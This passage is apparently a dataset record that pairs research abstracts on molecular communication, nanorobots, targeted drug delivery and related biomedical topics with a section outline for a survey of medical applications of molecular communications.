bullseye pattern around a sender colony. Other patterns, such as ellipses and clovers, are achieved by placing senders in different configurations. Experimental and theoretical analyses reveal which kinetic parameters most significantly affect ring development over time. Construction and study of such synthetic multicellular systems can improve our quantitative understanding of naturally occurring developmental processes and may foster applications in tissue engineering, biomaterial fabrication and biosensing. --- paper_title: Controlled differentiation of human bone marrow stromal cells using magnetic nanoparticle technology. paper_content: Targeting and differentiating stem cells at sites of injury and repair is an exciting and promising area for disease treatment and reparative medicine. We have investigated remote magnetic field activation of magnetic nanoparticle-tagged mechanosensitive receptors on the cell membrane of human bone marrow stromal cells (HBMSCs) for use in osteoprogenitor cell delivery systems and activation of differentiation in vitro and in vivo toward an osteochondral lineage. HBMSC-labeled with magnetic beads coated with antibodies or peptides to the transmembrane ion channel stretch activated potassium channel (TREK-1) or arginine–glycine–aspartic acid were cultured in monolayer or encapsulated into polysaccharide alginate/chitosan microcapsules. Upregulation in gene expression was measured in magnetic particle-labeled HBMSCs in response to TREK-1 activation over a short period (7 days) with an increase in mRNA levels of Sox9, core binding factor alpha1 (Cbfa1), and osteopontin. Magnetic particle-labeled HBMSCs encaps... --- paper_title: Perivascular and intravenous administration of basic fibroblast growth factor: vascular and solid organ deposition. paper_content: The in vivo mitogenicity of basic fibroblast growth factor (bFGF) for arterial smooth muscle cells relies on the removal of endothelium, raising the question of whether the endothelium serves as a mechanical barrier preventing contact of circulating bFGF with underlying smooth muscle cells or as a biochemical barrier that produces a local inhibitor of bFGF activity. To better define the role of the intact endothelium in modulating the vascular and tissue deposition of bFGF, we compared the fate of intravenous injections of 125I-labeled bFGF with perivascular controlled growth factor release. Peak serum bFGF levels were detected within 1 min of injection, and the growth factor was cleared thereafter with a serum half-life of almost 3 min. Polymeric controlled release devices delivered bFGF to the extravascular space without transendothelial transport. Deposition within the blood vessel wall was rapidly distributed circumferentially and was substantially greater than that observed following intravenous injection. The amount of bFGF deposited in arteries adjacent to the release devices was 40 times that deposited in similar arteries in animals who received a single intravenous bolus of bFGF. Endothelial denudation had a minimal effect on deposition following perivascular release, and it increased deposition following intravenous delivery 2-fold. The presence of intimal hyperplasia increased deposition of perivascularly released bFGF 2.4-fold but decreased the deposition of intravenously injected bFGF by 67%. In contrast, bFGF was 5- to 30-fold more abundant in solid organs after intravenous injection than it was following perivascular release. Deposition was greatest in the kidney, liver, and spleen and was substantially lower in the heart and lung. Thus, bFGF is rapidly cleared following intravenous injection and is deposited within both solid organs and the walls of blood vessels. Unlike the mitogenic potential of bFGF within blood vessels, vascular deposition is virtually independent of the presence of endothelium. Perivascular delivery is far more efficient than intravenous delivery at depositing bFGF within the arterial wall, and an increased neointima may provide added substrate for potential bFGF deposition but has limited contact with intravascular growth factor as a result of dilutional and flow-mediated effects. --- paper_title: Molecular Communication and Networking: Opportunities and Challenges paper_content: The ability of engineered biological nanomachines to communicate with biological systems at the molecular level is anticipated to enable future applications such as monitoring the condition of a human body, regenerating biological tissues and organs, and interfacing artificial devices with neural systems. From the viewpoint of communication theory and engineering, molecular communication is proposed as a new paradigm for engineered biological nanomachines to communicate with the natural biological nanomachines which form a biological system. Distinct from the current telecommunication paradigm, molecular communication uses molecules as the carriers of information; sender biological nanomachines encode information on molecules and release the molecules in the environment, the molecules then propagate in the environment to receiver biological nanomachines, and the receiver biological nanomachines biochemically react with the molecules to decode information. Current molecular communication research is limited to small-scale networks of several biological nanomachines. Key challenges to bridge the gap between current research and practical applications include developing robust and scalable techniques to create a functional network from a large number of biological nanomachines. Developing networking mechanisms and communication protocols is anticipated to introduce new avenues into integrating engineered and natural biological nanomachines into a single networked system. In this paper, we present the state-of-the-art in the area of molecular communication by discussing its architecture, features, applications, design, engineering, and physical modeling. We then discuss challenges and opportunities in developing networking mechanisms and communication protocols to create a network from a large number of bio-nanomachines for future applications. --- paper_title: Cellular-Level Surgery Using Nano Robots paper_content: The atomic force microscope (AFM) is a popular instrument for studying the nano world. AFM is naturally suitable for imaging living samples and measuring mechanical properties. In this article, we propose a new concept of an AFM-based nano robot that can be applied for cellular-level surgery on living samples. The nano robot has multiple functions of imaging, manipulation, characterizing mechanical properties, and tracking. In addition, the technique of tip functionalization allows the nano robot the ability for precisely delivering a drug locally. Therefore, the nano robot can be used for conducting complicated nano surgery on living samples, such as cells and bacteria. Moreover, to provide a user-friendly interface, the software in this nano robot provides a “videolized” visual feedback for monitoring the dynamic changes on the sample surface. Both the operation of nano surgery and observation of the surgery results can be simultaneously achieved. This nano robot can be easily integrated with extra modules that have the potential applications of characterizing other properties of samples such as local conductance and capacitance. --- paper_title: Investigating bioconjugation by atomic force microscopy paper_content: Nanotechnological applications increasingly exploit the selectivity and processivity of biological molecules. Integration of biomolecules such as proteins or DNA into nano-systems typically requires their conjugation to surfaces, for example of carbon-nanotubes or fluorescent quantum dots. The bioconjugated nanostructures exploit the unique strengths of both their biological and nanoparticle components and are used in diverse, future oriented research areas ranging from nanoelectronics to biosensing and nanomedicine. Atomic force microscopy imaging provides valuable, direct insight for the evaluation of different conjugation approaches at the level of the individual molecules. Recent technical advances have enabled high speed imaging by AFM supporting time resolutions sufficient to follow conformational changes of intricately assembled nanostructures in solution. In addition, integration of AFM with different spectroscopic and imaging approaches provides an enhanced level of information on the investigated sample. Furthermore, the AFM itself can serve as an active tool for the assembly of nanostructures based on bioconjugation. AFM is hence a major workhorse in nanotechnology; it is a powerful tool for the structural investigation of bioconjugation and bioconjugation-induced effects as well as the simultaneous active assembly and analysis of bioconjugation-based nanostructures. --- paper_title: Remote electronic control of DNA hybridization through inductive coupling to an attached metal nanocrystal antenna paper_content: Increasingly detailed structural1 and dynamic2,3 studies are highlighting the precision with which biomolecules execute often complex tasks at the molecular scale. The efficiency and versatility of these processes have inspired many attempts to mimic or harness them. To date, biomolecules have been used to perform computational operations4 and actuation5, to construct artificial transcriptional loops that behave like simple circuit elements6,7 and to direct the assembly of nanocrystals8. Further development of these approaches requires new tools for the physical and chemical manipulation of biological systems. Biomolecular activity has been triggered optically through the use of chromophores9,10,11,12,13,14, but direct electronic control over biomolecular ‘machinery’ in a specific and fully reversible manner has not yet been achieved. Here we demonstrate remote electronic control over the hybridization behaviour of DNA molecules, by inductive coupling of a radio-frequency magnetic field to a metal nanocrystal covalently linked to DNA15. Inductive coupling to the nanocrystal increases the local temperature of the bound DNA, thereby inducing denaturation while leaving surrounding molecules relatively unaffected. Moreover, because dissolved biomolecules dissipate heat in less than 50 picoseconds (ref. 16), the switching is fully reversible. Inductive heating of macroscopic samples is widely used17,18,19, but the present approach should allow extension of this concept to the control of hybridization and thus of a broad range of biological functions on the molecular scale. --- paper_title: A genetically encoded photoactivatable Rac controls the motility of living cells paper_content: The precise spatiotemporal dynamics of protein activity remain poorly understood, yet they can be critical in determining cell behaviour. A genetically encoded, photoactivatable version of the protein Rac1, a key GTPase regulating actin cytoskeletal dynamics, has now been produced; this approach enables the manipulation of the activity of Rac1 at precise times and places within a living cell, thus controlling motility. --- paper_title: Cationic thermosensitive liposomes: A novel dual targeted heat-triggered drug delivery approach for endothelial and tumor cells paper_content: Developing selectively targeted and heat-responsive nanocarriers holds paramount promises in chemotherapy. We show that this can be achieved by designing liposomes combining cationic charged and thermosensitive lipids in the bilayer. We demonstrated, using flow cytometry, live cell imaging, and intravital optical imaging, that cationic thermosensitive liposomes specifically target angiogenic endothelial and tumor cells. Application of mild hyperthermia led to a rapid content release extra- and intracellularly in two crucial cell types in a solid tumor. --- paper_title: Externally Controllable Molecular Communication paper_content: In molecular communication, a group of biological nanomachines communicates through exchanging molecules and collectively performs application dependent tasks. An open research issue in molecular communication is to establish interfaces to interconnect the molecular communication environment (e.g., inside the human body) and its external environment (e.g., outside the human body). Such interfaces allow conventional devices in the external environment to control the location and timing of molecular communication processes in the molecular communication environment and expand the capability of molecular communication. In this paper, we first describe an architecture of externally controllable molecular communication and introduce two types of interfaces for biological nanomachines; bio-nanomachine to bio-nanomachine interfaces (BNIs) for bio-nanomachines to interact with other biological nanomachines in the molecular communication environment, and inmessaging and outmessaging interfaces (IMIs and OMIs) for bio-nanomachines to interact with devices in the external environment. We then describe a proof-of- concept design and wet laboratory implementation of the IMI and OMI, using biological cells. We further demonstrate, through mathematical modeling and numerical experiments, how an architecture of externally controllable molecular communication with BNIs and IMIs/OMIs may apply to pattern formation, a promising nanomedical application of molecular communication. --- paper_title: A Molecular Communication System in Blood Vessels for Tumor Detection paper_content: This paper shows a proposal of a biological nano-communication system established in a blood vessel, aiming to support the detection and treatment of tumors. This system could either be used for diagnostic purposes in the early stage of a disease or to check any relapse of a previous disease already treated. In our proposal, the tumor detection happens through revealing tumor biomarkers on the cell surface, such as the CD47 protein. This detection takes advantage of some recent proposal if implementing nanorobot transport systems through modified flagellated bacteria. When a biomarker is detected, a molecular communication system is used for distributing the information over a number of nano-machines. These machines have a size similar to the white blood cells, so that they can flow through the vessel at the speed of the largest particles. The transported information is detected extra-body, through the use of smart probes, which triggers a decision tree in order to estimate the nature of the tumor and its most likely location. --- paper_title: Design and Analysis of Wireless Communication Systems Using Diffusion-Based Molecular Communication Among Bacteria paper_content: The design of biologically-inspired wireless communication systems using bacteria as the basic element of the system is initially motivated by a phenomenon called Quorum Sensing. Due to high randomness in the individual behavior of a bacterium, reliable communication between two bacteria is almost impossible. Therefore, we have recently proposed that a population of bacteria in a cluster is considered as a bio node in the network capable of molecular transmission and reception. This proposition enables us to form a reliable bio node out of many unreliable bacteria. In this paper, we study the communication between two nodes in such a network where information is encoded in the concentration of molecules by the transmitter. The molecules produced by the bacteria in the transmitter node propagate through the diffusion channel. Then, the concentration of molecules is sensed by the bacteria population in the receiver node which would decode the information and output light or fluorescent as a result. The uncertainty in the communication is caused by all three components of communication, i.e., transmission, propagation and reception. We study the theoretical limits of the information transfer rate in the presence of such uncertainties. Finally, we consider M-ary signaling schemes and study their achievable rates and corresponding error probabilities. --- paper_title: Caged compounds: photorelease technology for control of cellular chemistry and physiology paper_content: Caged compounds are light-sensitive probes that functionally encapsulate biomolecules in an inactive form. Irradiation liberates the trapped molecule, permitting targeted perturbation of a biological process. Uncaging technology and fluorescence microscopy are 'optically orthogonal': the former allows control, and the latter, observation of cellular function. Used in conjunction with other technologies (for example, patch clamp and/or genetics), the light beam becomes a uniquely powerful tool to stimulate a selected biological target in space or time. Here I describe important examples of widely used caged compounds, their design features and synthesis, as well as practical details of how to use them with living cells. --- paper_title: Modeling of Pathological Traits in Alzheimer's Disease Based on Systemic Extracellular Signaling Proteome paper_content: The study of chronic brain diseases including Alzheimer’s disease in patients is typically limited to brain imaging or psychometric testing. Given the epidemic rise and insufficient knowledge about pathological pathways in sporadic Alzheimer’s disease, new tools are required to identify the molecular changes underlying this disease. We hypothesize that levels of specific secreted cellular signaling proteins in cerebrospinal fluid or plasma correlate with pathological changes in the Alzheimer’s disease brain and can thus be used to discover signaling pathways altered in the disease. Here we measured 91 proteins of this subset of the cellular communication proteome in plasma or cerebrospinal fluid in patients with Alzheimer’s disease and cognitively normal controls to mathematically model disease-specific molecular traits. We found small numbers of signaling proteins that were able to model key pathological markers of Alzheimer’s disease, including levels of cerebrospinal fluid -amyloid and tau, and classify disease in independent samples. Several of these factors had previously been implicated in Alzheimer’s disease supporting the validity of our approach. Our study also points to proteins which were previously unknown to be associated with Alzheimer’s disease thereby implicating novel signaling pathways in this disorder. Molecular & Cellular Proteomics 10: --- paper_title: Universal computing by DNA origami robots in a living animal paper_content: Nanoscale robots made from DNA origami can dynamically interact with each other and perform logic computations in a living animal. --- paper_title: CRISPR interference: RNA-directed adaptive immunity in bacteria and archaea paper_content: Sequence-directed genetic interference pathways control gene expression and preserve genome integrity in all kingdoms of life. The importance of such pathways is highlighted by the extensive study of RNA interference (RNAi) and related processes in eukaryotes. In many bacteria and most archaea, clustered, regularly interspaced short palindromic repeats (CRISPRs) are involved in a more recently discovered interference pathway that protects cells from bacteriophages and conjugative plasmids. CRISPR sequences provide an adaptive, heritable record of past infections and express CRISPR RNAs — small RNAs that target invasive nucleic acids. Here, we review the mechanisms of CRISPR interference and its roles in microbial physiology and evolution. We also discuss potential applications of this novel interference pathway. --- paper_title: Short-Range Exosomal Transfer of Viral RNA from Infected Cells to Plasmacytoid Dendritic Cells Triggers Innate Immunity paper_content: Viral nucleic acids often trigger an innate immune response in infected cells. Many viruses, including hepatitis C virus (HCV), have evolved mechanisms to evade intracellular recognition. Nevertheless, HCV-permissive cells can trigger a viral RNA-, TLR7-, and cell-contact-dependent compensatory interferon response in nonpermissive plasmacytoid dendritic cells (pDCs). Here we report that these events are mediated by transfer of HCV-RNA-containing exosomes from infected cells to pDCs. The exosomal viral RNA transfer is dependent on the endosomal sorting complex required for transport (ESCRT) machinery and on Annexin A2, an RNA-binding protein involved in membrane vesicle trafficking, and is suppressed by exosome release inhibitors. Further, purified concentrated HCV-RNA-containing exosomes are sufficient to activate pDCs. Thus, vesicular sequestration and exosomal export of viral RNA may serve both as a viral strategy to evade pathogen sensing within infected cells and as a host strategy to induce an unopposed innate response in replication-nonpermissive bystander cells. --- paper_title: Extracellular vesicles: biology and emerging therapeutic opportunities paper_content: Within the past decade, extracellular vesicles have emerged as important mediators of intercellular communication, being involved in the transmission of biological signals between cells in both prokaryotes and higher eukaryotes to regulate a diverse range of biological processes. In addition, pathophysiological roles for extracellular vesicles are beginning to be recognized in diseases including cancer, infectious diseases and neurodegenerative disorders, highlighting potential novel targets for therapeutic intervention. Moreover, both unmodified and engineered extracellular vesicles are likely to have applications in macromolecular drug delivery. Here, we review recent progress in understanding extracellular vesicle biology and the role of extracellular vesicles in disease, discuss emerging therapeutic opportunities and consider the associated challenges. --- paper_title: Self-Folding Thermo-Magnetically Responsive Soft Microgrippers paper_content: Hydrogels such as poly(N-isopropylacrylamide-co-acrylic acid) (pNIPAM-AAc) can be photopatterned to create a wide range of actuatable and self-folding microstructures. Mechanical motion is derived from the large and reversible swelling response of this cross-linked hydrogel in varying thermal or pH environments. This action is facilitated by their network structure and capacity for large strain. However, due to the low modulus of such hydrogels, they have limited gripping ability of relevance to surgical excision or robotic tasks such as pick-and-place. Using experiments and modeling, we design, fabricate, and characterize photopatterned, self-folding functional microgrippers that combine a swellable, photo-cross-linked pNIPAM-AAc soft-hydrogel with a nonswellable and stiff segmented polymer (polypropylene fumarate, PPF). We also show that we can embed iron oxide (Fe2O3) nanoparticles into the porous hydrogel layer, allowing the microgrippers to be responsive and remotely guided using magnetic fields. Usi... ---
Title: Applications of molecular communications to medicine: a survey Section 1: Introduction Description 1: Introduce the concept of molecular communications and the significance of their application in medicine. Section 2: Diagnostic Applications Description 2: Illustrate some applications proposed for diagnostic purposes, including disease detection, personalized diagnosis, and imaging techniques. Section 3: Treatment of Diseases Description 3: Describe applications for advanced treatments, focusing on disease treatment methodologies such as drug delivery, virus-based techniques, bacteria-based techniques, nanorobots, antibody-based techniques, QD and FRET-based techniques, immune system activation, tissue engineering, and nanosurgery. Section 4: Implementation Mechanisms and Interfaces Description 4: Present the current mechanisms and interfaces being studied and developed for implementing molecular communication systems in medical applications, and discuss how they interconnect the nanoscale biological environment with external devices and systems. Section 5: Future Research Challenges Description 5: Identify the future research challenges of molecular communications for medical purposes. Section 6: Conclusion Description 6: Summarize the surveyed medical applications developed through molecular communications and potential future directions.